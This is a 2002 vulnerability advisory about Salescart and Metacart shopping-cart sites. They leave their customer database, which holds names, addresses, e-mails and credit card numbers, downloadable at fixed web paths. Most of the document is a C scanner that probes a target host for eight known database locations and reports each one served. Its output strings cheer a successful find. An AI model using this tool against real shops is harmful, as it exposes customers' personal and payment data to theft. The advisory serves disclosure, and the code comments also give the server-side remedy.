Salescart vuln.

2002-06-26T00:00:00
ID SECURITYVULNS:DOC:3130
Type securityvulns
Reporter Securityvulns
Modified 2002-06-26T00:00:00

Description

Summary: On a business website built with Salescart, all customer records belonging to that website are reachable. The whole database is held in the shop.mdb file, in the fpdb directory. Any user can reach this database without permission. This database holds some sensitive information, namely: name, surname, address, e-mail, phone number, credit card number, company name ... The credit card numbers in the shop.mdb file are placed in the query part.

Problem: Accessing the following URL will return the database used by the product: http://xxxshop.com/fpdb/shop.mdb

/* Salescart ve Metacart kullanILan bir alI$veri$ sitesindeki mu$teri kayItLarInI bulma */

/* tacettinkaradeniz@yahoo.com karadenizeregli@2002 */

/* I LoVe CiLeK :> */

/* Not: Bu programI ba$tan sona ben yazmadIm. Sadece gerekli yerlerde degi$iklik yaparak istediGim duzene getirdim :> */

#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <ctype.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

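/* Prints the four-line ASCII banner shared by the usage screen and the scan
   screen; each caller adds its own title line after it. */
static void baslik_yaz(void) {
    printf("\n\t _ ");
    printf("\n\t| . _ _ | o ");
    printf("\n\t| | (/ (| | | ");
    printf("\n\t | ");
}

/* Opens a TCP connection to `sin`. Returns the connected socket, or -1 after
   reporting the failure with perror(). The original kept going after a failed
   connect() and sent on the dead descriptor; callers now skip that request. */
static int baglan(const struct sockaddr_in *sin) {
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        return -1;
    }
    if (connect(sock, (const struct sockaddr *)sin, sizeof *sin) != 0) {
        perror("connect");
        close(sock);
        return -1;
    }
    return sock;
}

/* Sends `istek` on `sock` and reads at most cap-1 bytes of the reply into
   `tampon`, which is always NUL-terminated on return so that strstr()/printf()
   on it cannot run past the buffer (the original recv()'d the full buffer and
   searched it unterminated). Returns the byte count read, 0 on EOF, or -1 if
   send()/recv() failed (already reported with perror()). */
static ssize_t sor(int sock, const char *istek, char *tampon, size_t cap) {
    tampon[0] = '\0';
    if (send(sock, istek, strlen(istek), 0) < 0) {
        perror("send");
        return -1;
    }
    ssize_t n = recv(sock, tampon, cap - 1, 0);
    if (n < 0) {
        perror("recv");
        return -1;
    }
    tampon[n] = '\0';
    return n;
}

/*
 * Checks whether the host named in argv[1] serves the exported shop database
 * (shop.mdb / metacart.mdb) at any of the locations listed in the advisory
 * above: one plain HTTP GET per path, and the first bytes of each reply are
 * searched for "200". Any hit means the customer records are reachable over
 * HTTP; on the server side the remedy is to keep the .mdb outside the web
 * root or deny HTTP access to it.
 *
 * Returns 0 after a completed scan (found or not) and 1 on a usage or name
 * resolution error. Compared with the original: main() returns int; the
 * request and path tables are real pointer arrays; the reply buffer is
 * NUL-terminated before it is searched; socket()/connect()/send()/recv()
 * results are checked; the sockaddr is zeroed; the resolver's h_length is
 * bounded before the copy; and system("clear") is gone (it shells out via
 * PATH for a cosmetic effect).
 */
int main(int argc, char *argv[]) {
    /* One GET per candidate location of the exported database; hata[i] is the
       path printed when request tmp[i] is answered with a 200 status. */
    static const char *const tmp[] = {
        "GET /fpdb/shop.mdb HTTP/1.0\n\n",
        "GET /shoponline/fpdb/shop.mdb HTTP/1.0\n\n",
        "GET /database/metacart.mdb HTTP/1.0\n\n",
        "GET /shopping/database/metacart.mdb HTTP/1.0\n\n",
        "GET /shop/database/metacart.mdb HTTP/1.0\n\n",
        "GET /metacart/database/metacart.mdb HTTP/1.0\n\n",
        "GET /mcartfree/database/metacart.mdb HTTP/1.0\n\n",
        "GET /ASP/cart/database/metacart.mdb HTTP/1.0\n\n",
    };
    static const char *const hata[] = {
        "/fpdb/shop.mdb ",
        "/shoponline/fpdb/shop.mdb ",
        "/database/metacart.mdb ",
        "/shopping/database/metacart.mdb ",
        "/shop/database/metacart.mdb ",
        "/metacart/database/metacart.mdb ",
        "/mcartfree/database/metacart.mdb ",
        "/ASP/cart/database/metacart.mdb ",
    };
    _Static_assert(sizeof tmp / sizeof tmp[0] == sizeof hata / sizeof hata[0],
                   "request and path tables must have the same length");
    enum { ISTEK_SAYISI = sizeof tmp / sizeof tmp[0] };

    const char mesaj[] = "200";  /* status code looked for in the reply */
    char tampon[1024];           /* server header from the initial HEAD */
    char shoptampon[20];         /* first bytes of each GET reply */
    int buldum = 0;              /* number of paths answered with 200 */

    if (argc < 2) {
        baslik_yaz();
        printf("\n\nSalescart - Metacart (c) 2002 ");
        printf("\nKullanImI : %s www.xxxshopxyz.com \n\n", argv[0]);
        return 1;  /* usage error: non-zero status (the original exited 0) */
    }

    /* gethostbyname() is obsolete (IPv4-only, not thread-safe); it is kept so
       the block needs nothing beyond the original includes. getaddrinfo() in
       the same header is the replacement. */
    struct hostent *he = gethostbyname(argv[1]);
    if (he == NULL) {
        fprintf(stderr, "gethostbyname: could not resolve %s\n", argv[1]);
        return 1;
    }

    struct sockaddr_in sin;
    memset(&sin, 0, sizeof sin);  /* original left sin_zero uninitialized */
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    /* h_length comes from the resolver, not from us: bound the copy. */
    if (he->h_addrtype != AF_INET || he->h_length < 0 ||
        (size_t)he->h_length > sizeof sin.sin_addr ||
        he->h_addr_list[0] == NULL) {
        fprintf(stderr, "gethostbyname: no usable IPv4 address for %s\n",
                argv[1]);
        return 1;
    }
    memcpy(&sin.sin_addr, he->h_addr_list[0], (size_t)he->h_length);

    baslik_yaz();
    printf("\n\t Salescart - Metacart (c) 2002 ");

    /* First contact: echo the server's own response header so the reader can
       see which software answered. The original printed it unterminated. */
    int sock = baglan(&sin);
    if (sock >= 0) {
        if (sor(sock, "HEAD / HTTP/1.0\n\n", tampon, sizeof tampon) > 0) {
            printf("%s", tampon);
        }
        close(sock);
    }
    printf("Tarama YapILIyor..\n\n");

    for (size_t i = 0; i < ISTEK_SAYISI; i++) {
        sock = baglan(&sin);
        if (sock < 0) {
            continue;
        }
        /* Only the first 19 bytes are read, which is presumably the status
           line; a "200" there is taken to mean the file is being served. */
        if (sor(sock, tmp[i], shoptampon, sizeof shoptampon) > 0 &&
            strstr(shoptampon, mesaj) != NULL) {
            printf("%s : ", hata[i]);
            printf(" Oleyyy.. Bulundu :)\n");  /* original had "\)", an invalid escape */
            ++buldum;
        }
        close(sock);
    }

    if (buldum) {
        printf("\n Tarama isLemi %s web sistesi icin bitti.\n", argv[1]);
    } else {
        printf("\n Uzgunum tarama sonucu bir veri bulunamamIstIr...\n\n");
    }
    return 0;
}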

